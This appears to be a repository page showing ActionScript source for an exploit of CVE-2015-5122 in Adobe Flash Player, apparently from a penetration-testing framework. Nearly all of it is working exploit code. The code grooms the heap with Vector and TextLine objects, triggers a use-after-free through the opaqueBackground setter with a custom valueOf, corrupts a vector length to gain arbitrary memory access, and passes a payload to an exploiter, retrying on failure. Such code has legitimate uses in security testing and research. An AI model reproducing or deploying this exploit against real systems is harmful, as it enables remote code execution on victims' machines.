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Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
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Path: blob/master/external/source/exploits/CVE-2015-5122/
Views: 11779
package { import flash.display.DisplayObjectContainer; import flash.utils.ByteArray; import flash.system.Capabilities; import; import flash.external.ExternalInterface; import flash.text.*; import flash.text.*; import flash.text.engine.*; public class MyClass { static var _gc:Array, _ar:Array, _ar_reuse:Array, _ar_text_line:Array, _arLen:int, _ar_reuseLen:int, _ar_text_lineLen:int, _vu:Vector.<uint>, _tb:TextBlock, _mc:MyClass, _cnt:int, _vLen:int, LEN40:uint = 0x40000000; static function valueOf2() { try { if (++_cnt < _ar_text_lineLen) { //recursive call for next TextLine _ar_text_line[_cnt].opaqueBackground = _mc; } else { for(var i:int = 1; i <= 19; i++) _tb.recreateTextLine(_ar_text_line[_ar_text_lineLen - i]); // reuse freed memory for(i=0; i < _ar_reuseLen; i++) _ar_reuse[i].length = _vLen; } } catch (e:Error) { Logger.log("valueOf2 " + e.toString()); } return _vLen+8; } static function TryExpl(e:Exploit, platform:String, payload:ByteArray, try_number:uint) { if (try_number > 3) return try { // init vars Logger.log("init vars") _arLen = 30 _ar_text_lineLen = 50 _ar_reuseLen = 80 _ar = new Array(_arLen); _ar_text_line = new Array(_ar_text_lineLen) _ar_reuse = new Array(_ar_reuseLen) if (!_gc) _gc = new Array(); _gc.push(_ar); _gc.push(_ar_text_line); _gc.push(_ar_reuse); if (!_tb) { _tb = new TextBlock(new TextElement("TextElement", new ElementFormat())); if (!_tb) throw new Error("_tb = " + _tb); } _mc = new MyClass(); _vLen = 400/4-2; // fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset) Logger.log("fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)") for(var i:uint = 0; i < _arLen; i++) _ar[i] = new Vector.<uint>(_vLen) // prepare Vector objects Logger.log("prepare Vector objects") for(i = 0; i < _ar_reuseLen; i++) { _ar_reuse[i] = new Vector.<uint>(8); _ar_reuse[i][0] = i; _ar_reuse[i][1] = 0xdeedbeef } // prepare TextLines Logger.log("prepare TextLines") for(i = 0; i < _ar_text_lineLen; i++) _ar_text_line[i] = _tb.createTextLine() // fill 1016-byte holes (0x38c is a size of internal TextLine object) Logger.log("fill 1016-byte holes (0x38c is a size of internal TextLine object)") for(i = 0; i < _ar_text_lineLen; i++) _ar_text_line[i].opaqueBackground = 1 // alloc 1016 bytes // set custom valueOf() for _mc Logger.log("set custom valueOf() for _mc") MyClass.prototype.valueOf = valueOf2 // here we go, call the vulnerable setter Logger.log("here we go, call the vulnerable setter") //_cnt = _ar_text_lineLen - 6 _cnt = _ar_text_lineLen - 20 _ar_text_line[_cnt].opaqueBackground = _mc // find corrupted vector length Logger.log("find corrupted vector length ") for(i=0; i < _ar_reuseLen; i++) { _vu = _ar_reuse[i]; if (_vu.length > _vLen+2) { Logger.log("ar["+i.toString()+"].length = " + _vu.length.toString(16)); Logger.log("ar["+i.toString()+"]["+_vLen.toString(16)+"] = " + _vu[_vLen].toString(16)); if (_vu[_vLen] == _vLen) { // corrupt next vector _vu[_vLen] = LEN40; // get corrupted vector _vu = _ar_reuse[_vu[_vLen+2]]; break; } };// else CheckCorrupted(_vu, i); // 4RnD } // check results Logger.log("v.length = " + _vu.length.toString(16)); if (_vu.length < LEN40) throw new Error("try again"); var exploiter:Exploiter = new Exploiter(e, platform, payload, _vu, 0x62) } catch (err:Error) { Logger.log("TryExpl " + err.toString()); if (err.toString().indexOf("try again") != -1) { MyClass.TryExpl(e, platform, payload, try_number + 1) } } } } }